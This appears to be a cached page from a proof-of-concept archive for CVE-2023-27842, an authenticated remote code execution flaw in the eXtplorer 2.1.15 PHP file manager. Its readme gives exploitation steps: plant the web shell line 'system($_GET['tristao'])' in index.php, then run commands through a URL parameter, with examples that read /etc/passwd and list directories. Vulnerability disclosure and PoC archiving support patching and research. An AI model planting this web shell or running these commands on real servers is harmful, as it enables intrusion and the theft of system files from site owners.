Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2023-27842 PoC — eXtplorer 安全漏洞

Source
Associated Vulnerability
Title:eXtplorer 安全漏洞 (CVE-2023-27842)
Description:eXtplorer是一款基于PHP的文件管理器。 eXtplorer v.2.1.15版本存在安全漏洞,该漏洞源于存在不安全权限漏洞,远程攻击者利用该漏洞可以通过index.php组件执行任意代码。
Readme
Title: eXtplorer 2.1.15 – Insecure Permissions following Remote Code Execution (Authenticated)<br>
Date: 2022-11-09<br>
Author: Francisco Marinho<br>
Vendor Homepage: http://extplorer.net/<br>
Software Link: http://extplorer.net/attachments/download/99/eXtplorer_2.1.15.zip<br>
Version: 2.1.15<br>
Tested on: Linux<br>
==========> POC <==========<br>
<br>
1- Login with your account<br>
2- Access the directory /index.php<br>
3- Edit index.php, adding “system($_GET[‘tristao’]);” on line two.<br>
4- Acess homepage index.php<br>
Examples:<br>
cat /etc/passwd<br>
/index.php?tristao=cat%20%20/etc/passwd<br>
cat ls -la<br>
/index.php?tristao=ls%20-la<br>
File Snapshot

[4.0K] /data/pocs/47948f17efe33e6f41264e75f53c35c457a58e5a └── [ 664] README.md 0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.